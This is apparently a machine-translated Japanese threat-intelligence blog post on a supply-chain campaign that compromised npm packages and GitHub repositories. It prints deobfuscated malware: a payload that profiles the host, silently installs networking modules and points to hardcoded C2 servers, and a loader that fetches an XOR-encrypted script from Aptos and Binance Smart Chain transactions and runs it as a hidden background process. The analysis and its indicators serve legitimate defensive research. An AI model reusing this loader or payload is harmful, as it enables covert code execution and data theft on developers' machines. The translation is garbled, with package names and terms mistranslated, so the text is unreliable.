最近、React Native AriaとGlueStackに関連する16の人気パッケージが、脅威行為者グループによって侵害されたというニュースをご覧になったかもしれません。 これ.以前、我々は、彼らがパッケージを侵害したことを検出した。 ランド・ユーザー・エージェント 2025年5月5日 これ.
それ以来、私たちはこの脅威の主体を追跡しており、まだ完全には公表していない小規模な攻撃を観察してきた。しかし、彼らの活動の全体像を把握するために、それらをまとめたいと考えました。
初期の悪質なパッケージ
2025年5月8日、我々のシステムはすでにnpmに悪質と思われる2つの新しいパッケージを警告していた。それらは
これらはどちらも同じユーザーがアップロードしたものだ、 アミンエンジニアリングEメールで登録 aminengineerings@gmail[.]com.最初のバージョンから、どちらも悪意のあるペイロードを含んでおり、このパッケージが脅威行為者自身のものであることを示している。
より悪質なパッケージ
gluestackへの攻撃の後、攻撃者によってリリースされた2つの追加パッケージも確認された。これらのパッケージは2025年6月8日に以下の名前でリリースされた。 tailwindcss-animate-expand そして マングース・ライト.というユーザーによって公開された。 マットファーサー.このユーザーはその後すぐに削除された。
具体的には tailwindcss-animate-expand パッケージは、ペイロードの構造が異なるので注意が必要だ。最初の部分はこうなっている:
global['r']=require;(function(){var Afr='',xzH=906-895;...もはや global['_V'] 変数がセットされている。サンドボックスでこれを実行すると、最終的なペイロードも若干異なることがわかる。難読化解除後のペイロードは以下のようになる:
global._V = 'A4';
(async () => {
try {
const c = global.r || require;
const d = global._V || '0';
const f = c('os');
const g = c("path");
const h = c('fs');
const i = c('child_process');
const j = c('crypto');
const k = f.platform();
const l = k.startsWith("win");
const m = f.hostname();
const n = f.userInfo().username;
const o = f.type();
const p = f.release();
const q = o + " " + p;
const r = process.execPath;
const s = process.version;
const u = new Date().toISOString();
const v = process.cwd();
const w = typeof __filename === "undefined" || __filename !== "[eval]";
const x = typeof __dirname === 'undefined' ? v : __dirname;
const y = g.join(f.homedir(), ".node_modules");
if (typeof module === "object") {
module.paths.push(g.join(y, "node_modules"));
} else {
if (global._module) {
global._module.paths.push(g.join(y, "node_modules"));
} else {
if (global.m) {
global.m.paths.push(g.join(y, 'node_modules'));
}
}
}
async function z(V, W) {
return new global.Promise((X, Y) => {
i.exec(V, W, (Z, a0, a1) => {
if (Z) {
Y("Error: " + Z.message);
return;
}
if (a1) {
Y("Stderr: " + a1);
return;
}
X(a0);
});
});
}
function A(V) {
try {
c.resolve(V);
return true;
} catch (W) {
return false;
}
}
const B = A("axios");
const C = A("socket.io-client");
if (!B || !C) {
try {
const V = {
"stdio": "inherit",
windowsHide: true
};
const W = {
"stdio": "inherit",
"windowsHide": true
};
if (B) {
await z("npm --prefix \"" + y + "\" install socket.io-client", V);
} else {
await z("npm --prefix \"" + y + "\" install axios socket.io-client", W);
}
} catch (X) {}
}
const D = c("axios");
const E = c("form-data");
const F = c("socket.io-client");
let G;
let H;
let I = {};
const J = d.startsWith('A4') ? "http://136.0.9.8:3306" : "http://166.88.4.2:443";
const K = d.startsWith('A4') ? "http://136.0.9.8:27017" : "http://166.88.4.2:27017";
...
特に興味深いのは、そのバージョンは A4この新しいC2サーバーを使用する合図として、週末の攻撃で参照された。
また、"古い "C2サーバーについてはもはや言及されていない。その代わりに、IP 166.88.4[.]2.
警告のサイン
この攻撃の前に、我々はいくつかの小さなパッケージが危険にさらされていることに気づいていた。以下がそのパッケージである:
これらのパッケージは3つの異なる個人のもので、ダウンロード数は週に100未満です。これらの脅威者は一貫してnpmアカウントのトークンを侵害できているようです。
侵害されたGitHubリポジトリ
これらの攻撃をさらに調査するにつれて、私たちは、これらの脅威行為者がどのように活動しているかをより深く知ることができる証拠がないか、他のエコシステムを調査することにしました。私たちは、同じ脅威行為者が侵害したGitHub上の19のリポジトリを検出することができました:
この中で目立つコミットがいくつかある:
脅威者は使用するペイロードを少し変えている。この場合、彼らはペイロードをbase64エンコードし、eval()に渡している。以下はデコードされたペイロードで、その機能を説明するコメントで注釈されている。
/*****************************************************************************************
* Malware “loader” that hides its real payload on two block-chains. *
* Flow ⬇️ *
* 🥇 Step-1 Read pointer on Aptos *
* 🥈 Step-2 Use pointer on Binance Smart Chain (BSC) *
* 🥉 Step-3 Pull out hidden blob *
* 🗝️ Step-4 Decode & decrypt *
* 🚀 Step-5 Run it silently *
*****************************************************************************************/
/* ───────────────────────────── Bootstrap ───────────────────────────── */
global['r'] = require; // save `require` as global.r (little obfuscation)
(async () => {
/* quick aliases */
const c = global; // shorthand for `global`
const i = c['r']; // shorthand for `require`
/* 🛠 Helper 1: GET url → JSON */
async function e (url) {
return new Promise((resolve, reject) => {
i('https')
.get(url, res => {
let body = '';
res.on('data', chunk => (body += chunk));
res.on('end', () => {
try { resolve(JSON.parse(body)); } catch (err) { reject(err); }
});
})
.on('error', reject)
.end();
});
}
/* 🛠 Helper 2: call BSC JSON-RPC */
async function o (method, params = []) {
return new Promise((resolve, reject) => {
const payload = JSON.stringify({ jsonrpc: '2.0', method, params, id: 1 });
const opts = { hostname: 'bsc-dataseed.binance.org', method: 'POST' };
const req = i('https')
.request(opts, res => {
let body = '';
res.on('data', chunk => (body += chunk));
res.on('end', () => {
try { resolve(JSON.parse(body)); } catch (err) { reject(err); }
});
})
.on('error', reject);
req.write(payload);
req.end();
});
}
/* ─────────── Core routine that implements 🥇 → 🗝️ steps ─────────── */
async function t (aptosAccount) {
/* 🥇 STEP-1 Read pointer on Aptos */
const latestTx = await e(
`https://fullnode.mainnet.aptoslabs.com/v1/accounts/${aptosAccount}/transactions?limit=1`
);
const bscHash = latestTx[0].payload.arguments[0]; // pointer → BSC tx-hash
/* 🥈 STEP-2 Fetch BSC transaction carrying the payload */
const bscTx = await o('eth_getTransactionByHash', [bscHash]);
const hexBlob = bscTx.result.input.slice(2); // drop "0x"
/* 🥉 STEP-3 Pull out hidden blob (still unreadable) */
const rawText = Buffer.from(hexBlob, 'hex').toString('utf8');
const b64Chunk = rawText.split('..')[1]; // keep part after ".."
/* 🗝️ STEP-4 Decode & decrypt */
const encrypted = atob(b64Chunk); // Base-64 → binary string
const KEY = '$v$5;kmc$ldm*5SA';
let payload = '';
for (let j = 0; j < encrypted.length; j++) {
payload += String.fromCharCode(
encrypted.charCodeAt(j) ^ KEY.charCodeAt(j % KEY.length)
);
}
return payload; // plain-text JS to execute
}
/* 🚀 STEP-5 Run it silently in the background */
try {
const script = await t(
'0xe66ae4c5e9516048911b3ade1bc8b258197259604c1206cfeca01451a7c22e6d'
);
i('child_process')
.spawn(
'node',
['-e', `global['_V']='${c['_V'] || 0}';${script}`],
{ detached: true, stdio: 'ignore', windowsHide: true }
)
.on('error', () => { /* swallow child errors */ });
} catch (err) {
/* stay quiet on any failure */
}
})(); このコードは巧妙で、2つの異なるブロックチェーンの内容から部分的にブートストラップしている。ステップ・バイ・ステップで概要を説明しよう:
バイナンス・スマートチェーン上の取引は以下で確認できる。このウォレットと契約は2025年2月7日から存在していることは注目に値する:
https://bscscan.com/tx/0x5b28b2aa49bae766099aab7c74956d17c305079d9d3575256d3a72c310079c37
サンドボックスでコードを実行し、最終的なペイロードを取得したところ、それは大きな変更もなく、以前すでに文書化したのと同じペイロードだった。
結論
この脅威者は、npmパッケージだけでなく、GitHubリポジトリも積極的かつ一貫して侵害していることがわかる。さらに、彼らはRATで独自のパッケージをデプロイする実験も行っている。彼らはまた、悪意のあるコードをプッシュする方法としてブロックチェーンを使い始めている。
妥協の指標
パッケージ
ソラノーティルウェブ3ソケットtailwindcss-animate-expandマングースライトlfwfinance/sdklfwfinance/sdk-devアルゴランド-htlcavm-satoshi-ダイスビアテックAVMガスステーションアーク200クライアント計算ノード
知的財産権
166.88.4[.]2136.0.9[.]8
アプトス口座
0xe66ae4c5e9516048911b3ade1bc8b258197259604c1206cfeca01451a7c22e6d
BSCアドレス
0x9BC1355344B54DEDf3E44296916eD15653844509
BSC契約
0x8EaC3198dD72f3e07108c4C7CFf43108AD48A71c
.avif)
